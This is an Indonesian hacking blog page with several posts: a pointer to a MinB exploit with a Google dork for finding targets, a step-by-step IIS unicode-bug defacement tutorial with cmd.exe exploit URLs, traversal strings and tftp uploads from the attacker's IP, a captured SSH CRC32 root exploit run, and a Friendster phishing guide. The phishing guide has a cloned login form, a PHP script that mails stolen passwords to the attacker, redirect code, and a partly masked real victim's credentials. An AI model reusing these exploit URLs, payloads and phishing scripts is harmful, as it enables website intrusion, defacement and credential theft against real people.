,
Get paid To Promote at any Location

free counters

  • Web
  • Remo xp
  • cahyo. Powered by Blogger.
    RSS
    Showing posts with label Vuln. Show all posts
    Showing posts with label Vuln. Show all posts

    MinB Remote Code Execution Exploit


    Wah, ada info baru di milw0rm


    Mari kite telusuri bagian yang ini, wah gila abis ternyata semua file phpnya bisa di remote.



    Lets see:


    http://www.milw0rm.com/exploits/6432


    Ehem ehem..


    Ni google dorknya: Powered by minb or minB index.php


    Cuma dikit ^_^ Semoga ada hasilnya


    Enjoy your time



    Free Template Blogger collection template Hot Deals SEO
    • Digg
    • Del.icio.us
    • StumbleUpon
    • Reddit
    • RSS

    Deface Website – Via URL – Windows Version



    Zzzz….. *Clink* “We Come Back” (((dolby stereo))) pakabar sob dekaters ?? gimana da pahamin lom posting sebelumnya?? pasti rada puyeng ya!! ato malah pusingnya ampe sekarang belom sembuh ? hehhehe, kali ini kita tambahin pusing kalian jadi 2 ( dua ) kali lipat ato bahkan berlipat-lipat . Gini Sob, kita tau ilmu didunia maya luas banged dan banyak sekali kontoversi baik positif/negatif, posting kali ini bukannya ngajarin kalian untuk berbuat jahat ato usil tapi kita hanya sekedar pengen berbagi pengetahuan saja ga` ada motif laen dan kita juga ga menganjurkan untuk kalian mempraktekkannya, setiap tindakan kita sudah ada yang mencatatnya kita tahu itu.. tapi namanya juga kita hanya manusia yang egois dan selalu mendahulukan kepuasan batin nah.. itu awal dari kehancuran kita sendiri dan nantinya dimintai pertanggung-jawaban dari semua itu.





    Aduh, koq jadi ngelantur gini ya ) Ok Sob , kita langusng ke pokok pembahasan tapi pesan kita “Resiko Ditanggung Masing – Masing”. Pada posting ini kita coba membahas “deface website” apa itu ?? Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya ilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo sob adalah web master dan sob ngerubah tampilan halaman situs yang sob punya tentu saja itu nggak bisa disebut deface…heheheh. Banyak yang bertanya “gimana sich nge-deface situs?” proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kalian ketahui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbeda apabila kita ingin melakukan deface diantara kedua OS tsb. Operating System atau OS biasanya kalo kita kelompikin ke 2 keluarga besar,yaitu :



    1. IIS (server untuk microsoft, dkk)


    2. Unix(linux,BSD,IRIX,SOLARIS,dsb)



    elalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui…Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan “unicode bug”. Sayah tidak akan menjelaskan panjang lebar mengenai “unicode bug” ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! gn bilang sapa2 yah sebenernyah sayah teh emang gak tau …ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.



    OK…mari kita mulai…Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)…key nya terserah


    kowe…..Lalu utk mengetahui site itu menggunakan MS IIS 4.0/5.0…Kita scan terlebih dahulu di www.netcraft.com……dapat site yah..??…Okeh..setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 …Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc….coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg


    bisa and DL di http://accessftp.topcities.com/…. or memakai cara manual yg lebih sering kita gunakan ehehhehehhee…contoh:







    http://wwwtargethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

    Ada dua kemungkinan yang tampil pada browser Anda yaitu:


    Kahiji : Muncul pesan ERROR …


    Kaduana : Muncul daftar file-file dari drive C pada komputer server


    target. Bila ini terjadi maka


    www.targethost.com tadi ada kemungkinan untuk bisa kita deface…



    Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL


    diatas menjadi empat bagian yaitu :




    · Bagian host, yaitu “http://www.targethost.com”


    · Bagian exploit string, yaitu “/scripts/..%255c..%255c”


    · Bagian folder, yaitu “/winnt/system32/”


    · Bagian command, yaitu “cmd.exe?/c+dir+c:\”



    Kita lihat pada bagian command diatas menunjukkan perintah “dir c:\” yang berarti melihat seluruh file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti “dir d:\” atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda “+”. Koe bahkan bisa menge tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah “ipconfig.exe /all”



    Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering tembus adalah :


    - /cgi-bin/..%255c..%255c


    - /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..


    - /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..




    - /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..


    - /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..


    - /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..


    - /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..


    - /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..


    - /scripts/..%255c..%255c



    Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss …hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran….(yg sabar yah nak nyari targetnyah…ehehhehehe).



    Lanjuttt……udeh dapet site yg bug unicodenyah gak di patch..??….Langkah berikutnya adalah mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml. Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini



    http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set





    URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??…Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah…gak ada yahh ..??…coba deh koe ripresh lagehh…udah ketemuuu…nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah…..Kita ambil contoh PATH_TRANSLATEDnyah :


    C:\InetPub\wwwroot….Perintahnya ng-DIR nyah :



    http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot



    Huaaaaaaa….isinyah banyak banged yahh…..mana dokumen2 web yg kita curigain itu ada 3 bijih. lagehh… .hemm santeyy…oiyahh…lupa sayah…Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah….. truss kita cari dokumen web itu disitu utk kita RENAME….gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy…coba skrg koe buka site aslinyah di laen window….


    http://www.targethost.com == neh yg ini……di situ kan alias di


    http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot


    dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME….misalnya : di



    http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot


    itu ada :




    Directory of C:\InetPub\wwwroot


    07/20/01 03:21p 1,590 default.htm


    07/20/01 03:21p 590 index.html


    07/20/01 03:21p 3,453 main.html



    Udah di buka kan site aslinyah…nah coba masukin salah satu dokumen web itu di site asli nyah… contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :



    http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html



    Lihat apa yg terjadi di IE kitaa



    CGI Error


    The specified CGI application misbehaved by not returning a complete




    set of HTTP headers. The headers it did return are:


    Access is denied



    Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??



    CGI Error


    The specified CGI application misbehaved by not returning a complete


    set of HTTP headers. The headers it did return are :



    Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee (Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk langkah selanjutnyah*)



    Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..Kedua lewat TFTP32.



    *Cara pertama :*




    Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL berikut :



    http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe



    Pasti hasilnya akan seperti di bawah ini :



    CGI Error


    The specified CGI application misbehaved by not returning a complete


    set of HTTP headers. The headers it did return are :


    1 file(s) copied.



    Tujuan kita meng-copy cmd.exe menjadi cmdku.exe adalah agar kita bisa menjalankan perintah echo dengan lengkap. Apabila Anda menggunakan cmd.exe maka perintah echo tidak bisa digunakan untuk menulis atau membuat file.







    Okeih Sob skrg mari kita up-load file nya lewat perintah echo perintahnya :



    dapat dilihat disini


    Kita liat apa yg terjadi di IE kita.



    CGI Error


    The specified CGI application misbehaved by not returning a complete


    set of HTTP headers. The headers it did return are :



    Waa..waaa.selamat anda telah berhasil meng-upload file anda lewat cara echo tadee silahkan buka web site target tadi



    Oiyahh sayah uraikan sedikit URL ajaib tadii. Sayah akan membagi URL tadi menjadi empat bagian :








    • Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c


    • Bagian command yaitu, cmdku.exe?/c+echo+


    • Bagian HTML




    • Bagian PATH_TRANSLATEDnyah(rootnyah)+Dokumen webnyah yaitu,


      C:\InetPub\wwwroot\main.html




    Cara Kedua Utk meng-upload file lewat TFTP32 sebelumnyah koe2 orang harus mendownload sopwer TFTP32 terlebih dahulu di http://www.download.com ketik keynya TFTP32 dan koe harus maen diserver (sebab di user pasti takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya :








    • http://www.targethost.com/scripts/..%255c..%255c


      /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe


      up-load)+ C:\InetPub\wwwroot\main.html




    Kita liat lagi apa yg terjadi di IE kita.



    CGI Error


    The specified CGI application misbehaved by not returning a complete


    set of HTTP headers. The headers it did return are :





    Waa..waaa.selamat anda telah berhasil meng-upload file anda memakai sopwer TFTP32 tadee silahkan buka web site target tadi.



    Sayah akan uraikan juga URL tadee menjadi 4 bagian :






    • Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c


    • Bagian folder, yaitu /winnt/system32/


    • Bagian command, yaitu cmd.exe?/c+tftp+-i+202.95.145.71(IPmu)+get+antique.htm(file yg mau koe up-load)+


    • Bagian PATH_TRANSLATEDNYAH(rootnyah)+Dokumen webnyah yaitu,


      C:\InetPub\wwwroot\main.html






    Kekurangannyah dalam meng-upload file lewat TFTP32terkadang suatu server (web site) tidak mau menerima up-load file kita tadee.Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee.



    Sebelumnya dan sesudahnyah sayah mo ngejelasin bahwa tutorial ini tidak mempunyai maksud tertentu selain untuk ilmu pengetahuan dan kebebasan dalam berbagi ilmu pengetahuan. Sayah tidak bertanggung jawab apapun terhadap segala sesuatu yang terjadi akibat tutorial ini. Tutorial ini bersifat terbuka yang berarti Anda bisa memberikan kritik dan saran terhadap tutorial ini.



    ——————————————–END————————————————–



    Nah itu adalah cara pemanfaatan lubang di IIS server yang dikenal dengan nama UNICODE, untuk tambahan bahwa sekarang UNICODE telah berkembang banyak ditemukan beberapa bug baru yang dapat dimanfaatkan untuk masuk ke server IIS, untuk hal ini kalian bisa cari di situs2 cyber underground…hehehehe “yang kreatif donk..!!”



    Okeh sekrang kita ke UNIX yah…di unix sendiri yang perlu dilakukan untuk men-deface situs adalah memperoleh fasilitas root dari server tsb. Cara memperoleh fasilitas root tentu saja melalui exploit (mengenai masalah exploit bisa kalian lihat di bagian “Hacking Shell”). Nah disini gue akan memberi salah satu contoh mendapatkan fasilitas root dari exploit “SSH CRC32 Exploit”, exploit ini ditujukan pada SSH server yang berjalan pada SSH protocol 1 atau SSH protocol 2 configured to drop back to protocol 1 Ketika berjalan exploitnya akan bekerja seperti ini :



    [root@juventini]# ./x10 -t1 192.168.1.120



    password:



    Target: Small – SSH-1.5-1.2.26





    Attacking: 192.168.1.120:22


    Testing if remote sshd is vulnerable # ATTACH NOWYES #


    Finding h – buf distance (estimate)


    (1 ) testing 0×00000004 # SEGV #


    (2 ) testing 0×0000c804 # FOUND #


    Found buffer, determining exact diff


    Finding h – buf distance using the teso method


    (3 ) binary-search: h: 0×083fb7fc, slider: 0×00008000 # SEGV #


    (4 ) binary-search: h: 0×083f77fc, slider: 0×00004000 # SURVIVED #




    (5 ) binary-search: h: 0×083f97fc, slider: 0×00002000 # SURVIVED #


    (6 ) binary-search: h: 0×083fa7fc, slider: 0×00001000 # SEGV #


    (7 ) binary-search: h: 0×083f9ffc, slider: 0×00000800 # SEGV #


    (8 ) binary-search: h: 0×083f9bfc, slider: 0×00000400 # SEGV #


    (9 ) binary-search: h: 0×083f99fc, slider: 0×00000200 # SURVIVED #


    (10) binary-search: h: 0×083f9afc, slider: 0×00000100 # SEGV #


    (11) binary-search: h: 0×083f9a7c, slider: 0×00000080 # SEGV #


    (12) binary-search: h: 0×083f9a3c, slider: 0×00000040 # SEGV #


    (13) binary-search: h: 0×083f9a1c, slider: 0×00000020 # SEGV #




    (14) binary-search: h: 0×083f9a0c, slider: 0×00000010 # SURVIVED #


    (15) binary-search: h: 0×083f9a14, slider: 0×00000008 # SURVIVED #


    Bin search done, testing result


    Finding exact h – buf distance


    (16) trying: 0×083f9a14 # SURVIVED #


    Exact match found at: 0×000065ec


    Looking for exact buffer address


    Finding exact buffer address


    (17) Trying: 0×080865ec # SURVIVED #




    Finding distance till stack buffer


    (18) Trying: 0xb7f81400 # SEGV #


    (19) Trying: 0xb7f81054 # SEGV #


    (20) Trying: 0xb7f80ca8 # SEGV #


    (21) Trying: 0xb7f808fc # SEGV #


    (22) Trying: 0xb7f80550 # SEGV #


    (23) Trying: 0xb7f801a4 # SEGV #


    (24) Trying: 0xb7f7fdf8 # SEGV #


    (25) Trying: 0xb7f7fa4c # SEGV #




    (26) Trying: 0xb7f7f6a0 # SEGV #


    (27) Trying: 0xb7f7f2f4 # SEGV #


    (28) Trying: 0xb7f7ef48 # SEGV #


    (29) Trying: 0xb7f7eb9c # SEGV #


    (30) Trying: 0xb7f7e7f0 # SEGV #


    (31) Trying: 0xb7f7e444 # SEGV #


    (32) Trying: 0xb7f7e098 # SURVIVED # verifying


    (33) Trying: 0xb7f7e098 # SEGV # OK


    Finding exact h – stack_buf distance




    (34) trying: 0xb7f7de98 slider: 0×0200# SURVIVED #


    (35) trying: 0xb7f7dd98 slider: 0×0100# SURVIVED #


    (36) trying: 0xb7f7dd18 slider: 0×0080# SEGV #


    (37) trying: 0xb7f7dd58 slider: 0×0040# SEGV #


    (38) trying: 0xb7f7dd78 slider: 0×0020# SURVIVED #


    (39) trying: 0xb7f7dd68 slider: 0×0010# SEGV #


    (40) trying: 0xb7f7dd70 slider: 0×0008# SEGV #


    (41) trying: 0xb7f7dd74 slider: 0×0004# SURVIVED #


    (42) trying: 0xb7f7dd72 slider: 0×0002# SEGV #




    Final stack_dist: 0xb7f7dd74


    EX: buf: 0×080835ec h: 0×0807d000 ret-dist: 0xb7f7dcfa



    ATTACH NOW


    Changing MSW of return address to: 0×0808


    Crash, finding next return address


    Changing MSW of return address to: 0×0809


    Crash, finding next return address


    Changing MSW of return address to: 0×080a


    Crash, finding next return address




    EX: buf: 0×080835ec h: 0×0807d000 ret-dist: 0xb7f7dcf6



    ATTACH NOW


    Changing MSW of return address to: 0×0808


    Crash, finding next return address


    Changing MSW of return address to: 0×0809


    Crash, finding next return address


    Changing MSW of return address to: 0×080a


    Crash, finding next return address


    EX: buf: 0×080835ec h: 0×0807d000 ret-dist: 0xb7f7dcfc





    ATTACH NOW


    Changing MSW of return address to: 0×0808


    Crash, finding next return address


    Changing MSW of return address to: 0×0809


    No Crash, might have worked


    Reply from remote: CHRIS CHRIS



    ***** YOU ARE IN *****



    localhost.localdomain



    Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000




    i686


    unknown



    uid=0(root) gid=0(root)


    groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)



    …..HOREEEEE…dapat root heheehehhe, nah sekarang loe udah mendapatkan fasilitas root, okeh sekarang kita mulai men-deface situs yang tedapat pada server tsb. Pertama-tama perlu kalian ketahui bahwa biasanya halaman index pada server UNIX ditempatkan pada direktori tertentu, yaitu : home/html atau home/html/httpd atau bisa juga di direktori var/html atau var/html/httpd


    naH..tunggu apa lagi coba deh loe liat-liat isi direktori itu…untuk meyakinkannya loe buka situs tsb pada browser dan lihatlah apa nama dari file halaman index situs itu..hmmm biasanya sich index.html atau index.htm Udah dapat indexnya? kalo udah sekarang loe bisa echo deh…gampang kan??? heheheh..cuman kalo gue rada malas sich make echo mending bikin halaman baru…;)), gini caranya :






    1. ganti dulu nama indexnyamv index.htm oldindex.htm


    2. sekarang buka editor dari shell, bisa make vi atau pico : vi index.htm




    3. masukan HTML yang kalian buat di vi ataupun pico tadi


    4. buka browser kalian….heheeheh..udah ganti kan sekrang halamannya..:))) SiiiPPPP..!!




    Gitu aja kok caranya…mudah aja kan..?? hehehhe…intinya memang cuman bagaimana mendapatkan fasilitas root pada server, dan seperti yang telah gue bilang tadi bahwa setiap server memiliki karakteristik yang berbeda-beda sesuai dengan OS nya masing2. Sehingga diperlukan exploit yang berbeda apabila kita ingin mencoba menembus server yang memiliki OS yang berbeda pula…so many exploit out thare…just get iT..!! hehehheudah dulu yah…BUBAYYYYYY!!!!!!!!!!!!


    Free Template Blogger collection template Hot Deals SEO
    • Digg
    • Del.icio.us
    • StumbleUpon
    • Reddit
    • RSS

    Phising – Hack Friendster



    D



    Hasil capture FS orang lain hehehe FS siapa yah ? mohon maaf kalo yg punya lihat, tolong diganti passwordnya :)





    Dalam komputer, istilah bahasa Inggris phishing adalah suatu bentuk penipuan yang dicirikan dengan percobaan untuk mendapatkan informasi sensitif, seperti kata sandi dan kartu kredit, dengan menyamar sebagai orang atau bisnis yang terpercaya dalam sebuah komunikasi elektronik resmi, seperti e-mail atau pesan instan. Istilah ini muncul dari kata bahasa Inggris fishing (’memancing’),dalam hal ini berarti memancing informasi keuangan dan kata sandi pengguna. Oleh : http://id.wikipedia.org/wiki/Phishing.



    Sedangkan menurut saya Phishing sendiri mempunya arti menyamarkan sesuatu yang asli dengan yang palsu, sehingga yang palsu benar-benar mirip dengan yang asli, dengan tujuan penipuan. Kasus Phishing pernah terjadi di Official Web site BCA Online, hingga sekarang yaitu FS.



    Pembahasan ini sudah dijumpai dibanyak blog-blog namun pada umumnya hanya memberikan sedikit sekali gambaran bagaimana proses phishing itu terjadi, apabila tidak hati-hati maka account kita + passwordnya akan diketahui oleh orang lain.


    Baiklah sekarang akan saya berikan gambaran mengenai Phishing di FS, dalam proses Phishing di FS ada beberapa hal yang harus diketahui(versi saya), yaitu :



    1. Manajemen File URL.


    2. Pemahaman Form HTML.


    3. mail() command di PHP.


    4. Pemahaman Redirection.




    5. Kreatifitas difakename URL.



    5 hal tersebut merupakan faktor wajib yang harus diketahui sebelum melakukan Phishing, mengapa karena 5 komponen dasar tersebut menentukan berhasil/tidaknya sebuah Phishing, saya jelaskan fungsional 5 komponen tersebut.



    1.Manajemen File URL.



    Pentingnya manajemen File Url adalah dimana proses pemalsuan sebuah form yang asli ke yg palsu/yg akan kita gunakan, haruslah benar” sama modelnya/bentuknya sehingga orang lain bila tidak sangat teliti akan terkecoh bahwa form yang ada dimonitornya adalah asli, bila menggunakan Mozilla Firefox anda bisa mencuri form Login FS dengan menggunakan perintah : File > Save Page As > Filename isi “index.htm” > dan Save as Type “Web page, complete”. Tujuan dari penyimpanan file login tersebut adalah untuk membuat Login FS vesi Fake-nya, setelah kita simpan, kemudian kita rubah form actionnya seperti penjelasan no 2. Kemudian semua file tadi kita Upload ke Free Hosting kesukaan kita, saya menggunakan http://www.ripway.com -> ( http://h1.ripway.com/friendsterid ). Alamat diatas modelnya sama persis dengan Form login FS sehingga jika kita tidak teliti sangat berbahaya, yang membedakan adalah slide foto tidak berubah jika di refresh, dan juga tanggalnya, dan perhatikan source htmlnya khususnya dibagian <form>.





    2. Pemahaman Form HTML.



    Form HTML merupakan komponen dasar untuk mengirim informasi calon korban yang perlu dipamahami adalah komponen <form>,<input> komponen <form> mempunyai sub komponen yaitu “method” dan “action”, dimana action sangat menentukan proses Phishing yang akan kita lakukan, dan untuk <input> penting pada komponen “name” di FS input ada 2 sub komponen penting pembawa bencana :) , yaitu “email” dan “password” dimana “email” adalah id login si calon korban, script dibawah ini adalah contoh kutipan form yang saya gunakan untuk Phishing di FS.





    index.htm, form yang di edit untuk phishing





    <form name="login_form" method="post" action="http://fakename.com/login.php">


    Email: <input name="email" maxlength="100" size="22" alt="Email Address"


    tabindex="1" style="width: 200px ! important;" value="" type="text">


    Password: <input name="password" maxlength="10" size="22" alt="Password"


    tabindex="2" style="width: 200px ! important;" type="password">


    <td><div class="loginButton"><input value="Log In" tabindex="3" type="submit">




    </form>





    Yang saya rubah pada bagian “action” saja, diarahkan ke file penyetor password (login.php versi kita)yang nantinya dikirim ke e-mail kita menggunakan aplikasi PHP.



    3. Function mail() di PHP.



    Saya pilih opsi ini karena mudah menggunakannya, ada opsi lain misal store database, namun tambah ribed nantinya anda harus membuat database untuk memasuk kan email dan password korban, dan jika mencari free hostingan php yang support ke database agak sulit :) , lebih baik lagi jika anda mempunyai hostingan yang bayar dan support ke database plus function mail(), langsung saja, kita harus me ngetahui fungsi ini karena pada saat si target login di fake FS kita, maka disinilah password dan user name di setor ke kita, dengan menngunakan fungsi mail() di php password dan user di setor ke alamat e-mail kita, disini nama file yang digunakan adalah “login.php” file tersebut kita tempatkan di hostingan milik kita(baik yg free / bayar, pastinya harus support mail(), silahkan anda coba” terlebih dahulu, atau baca howto mail() function di php manual), script dibawah ini yang saya gunakan untuk mengirim user dan password sitarget ke e-mail saya:



    login.php, store user + password ke e-mail


    <?


    $id=$HTTP_POST_VARS['email'];




    $pass=$HTTP_POST_VARS['password'];


    $isi=”id: $id | password: $pass”;


    $to = ‘emailkita@fakename.com’;


    $subject = ‘Friendster Trap :) ’;


    $message = $isi;


    $headers = ‘Rejeki FS :) ’;


    mail($to, $subject, $message, $headers);




    ?>




    Sangat sederhana :) namun mematikan, jika ada yang login di fake FS kita maka user dan password akan dikirim ke “emailkita@fakename.com” dan kemudian halaman ini akan di redirect ke http://www.friendster.com”, akan kita bahas nanti mengenai redirect.



    4. Pemahaman Redirection.



    Redirection merupakan proses pemindahan halaman web secara otomatis/manual menggunakan script, script pertama redirection yang harus anda tahu adalah Redirection dari FS ke Fakefs kita, jadi option ini bisa menggunakan opsi manual dan otomatis, opsi manual bisa menggunakan gambar yang menarik sehingga jika kita klik gambar tersebut akan mengarah ke Fakefs kita, dan jika sudah ter klik dan target mengisikan login dan passwordnya di Fakefs kita, berhasil sudah cara ini, jika menggunakan opsi otomatis, yang saya gunakan adalah script di Flash berupa action script GetURL(”url”,”type”,”method”);, pada aplikasi flash jika kita menggunakan GetURL maka otomatis pada saat load animasi kita yang di dalamnya sudah disusupi GetURL maka halaman FS akan di redirect ke Fakefs kita (contoh : http://www.friendster.com/kuyamudik ). Jika halaman FS disamping kita buka menggunakan IE maka otomatis akan di redirect ke halaman Fakefs, karena di ditesti FS tersebut sudah ada file flash yang meredirect dari FS ke Fakefs, perhatikan address barnya, dan opsi ini berlaku jika menggunakan IE, jika pada Mozilla Firefox tidak berlaku, kecuali menggunakan type _blank.



    Action Script yang saya gunakan di Flash:


    press-fs.swf, file animasi disusupi action script redirection







    getURL("http://friendster-id.cjb.net","_self","get");




    Redirection ke 2 berada di file login.php dimana Email login dan password di kirim ke e-mail saya, karena menggunakan koneksi IIX, redirection ini tidak akan terasa, tau-tau anda sudah ada di halaman FS anda sendiri, padahal setelah anda login untuk ke 2 kalinya anda sudah terjebak, berikut script redirection ke 2 yang saya gunakan:



    login.php, file pengirim Email login FS + password ke email saya





    <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://www.friendster.com">


    <?


    $id=$HTTP_POST_VARS['email'];


    $pass=$HTTP_POST_VARS['password'];




    $isi=”id: $id | password: $pass”;


    $to = ‘emailkita@fakename.com’;


    $subject = ‘Friendster Trap :) ’;


    $message = $isi;


    $headers = ‘Rejeki FS :) ’;


    mail($to, $subject, $message, $headers);


    ?>







    5. Kreatifitas Fakename URL.



    Bagian ini juga sangat mendukung suksesnya Phishing di FS, atau disebut dengan kreatifitas membuat domain palsu / alamat palsu untuk Fakefs kita, saya sendiri menggunakan Fakefs domain http://www.friendster-id.cjb.net dengan bantuan cjb setidaknya alamat depan fakefs tersebut sudah sama dengan FS nya, disini anda dituntun mencari yang bagus untuk Faking domainnya, sehingga orang akan tertipu jika hanya melihat pada bagian tampilan saja :) .



    Rule Phishing FS, menurut gaya saya :) .





    [Target]->[Buka dan Login FS]->[Lihat testi teman yang terinfeksi Redirection]


    |– [Jika menggunakan Mozilla Firefox, halaman gagal di redirect]->[Gagal]->[X]




    |– [jika menggunakan IE, halaman akan di redirect ke Fakefs]->[Login di Fakefs]


    ->[Email + Password di rekam & dikirim ke email saya]->[diredirect ke FS semula]


    ->[Phishing FS sukses].





    Sederhana sekali bukan? :) .





    Komponen-komponen yang saya pakai:


    1. Freehosting di : http://www.ripway.com



    (http://h1.ripway.com/friendsterid) Sebagai tempat menyimpan file FS palsu/Fakefs yang sudah saya modif di bagian formnya.


    2. Freedomain : http://www.cjb.net (http://www.friendster-id.cjb.net)



    Fake URL yang mirip dengan http://friendster.com, dan bila dibuka isinya adalah file yang ada di ripway.com


    3. Hosting PHP :



    Hostingan yang support dengan function mail() yang digunakan untuk eksekusi pengiriman email dan password si target, disini saya gunakan login.php, atau anda akan menggunakan aplikasi database, silahkan saja, atau write() terserah kreasi anda sekalian :) .






    4. File Redirect :



    Saya menggunakan Flash, karena option otomatis redirectnya :) , hanya kelemahannya di Firefox tidak mempan :) , file ini nantinya akan disertakan di testi target.




    5. Email :



    Alamat email untuk store email dan password target.



    Contoh FS di comment/testinya sudah terkena Phishing :


    http://www.friendster.com/kuyamudik





    Contoh hasil target yang sukses terkirim di email saya:


    ± From Date Subject


    ============================================


    ± Nobody 10:16 am Friendster Trap :)


    ± Nobody 7:37 am Friendster Trap :)


    ± Nobody Mon, 10:37 pm Friendster Trap :)


    ± Nobody Mon, 10:25 pm Friendster Trap :)



    Jika dibuka isinya:


    =================================================




    Rejeki FS :)



    id: sapoedjagad@hotmail.com | password: s******t



    PENCEGAHAN



    Ada beberapa Opsi yang harus kita perhatikan untuk FS ini, diantaranya:





    1. Biasakan membuka FS menggunakan Mozilla Firefox :) .


    2. Matikan option auto approve, di FS kita karena jika ini tidak dilakukan maka bisa saja teman mengirim comment yang mengandung Phishing :) . Option -> Approve comments automatically: Pilih “Never”.




    3. Teliti jika ingin login lihat URL nya, jika bukan dari http://friendster.com maka jangan berani-berani login, close saja, dan buka http://friendster.com.




    Hanya opsi tersebut yang dapat saya sampaikan, sering-sering cek menggunakan 2 Browser lebih bagus.



    Artikel ini saya tulis karena iseng saja, ingin ngebajak FS temen hehe :D dan gunakan sebagai informasi yang positif, jika ada yg menyalahgunakan isi diartikel ini penulis tidak bertanggung jawab.





    Isi jika E-Mail dibuka :D



    Salam manis,



    Note : ada beberapa link yang sudah miss, karena host di site gratisan :)



    Hide “Phising Friendster (FS)”


    Free Template Blogger collection template Hot Deals SEO
    • Digg
    • Del.icio.us
    • StumbleUpon
    • Reddit
    • RSS

    Cara Mudah Deface Web Via RFI


    Cara Mudah Deface Remote File Include


    Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..



    cd namadirectory = Melihat Suatu directory

    ls -al = Melihat Suatu Directory Lebih Dalam lagi

    find = Mengecek Directory directory

    cat = Membaca Suatu Berkas

    wget = MengUpload suatu Files

    tar -zxvf = MengExtraxt suatu files yang berbentuk tgz

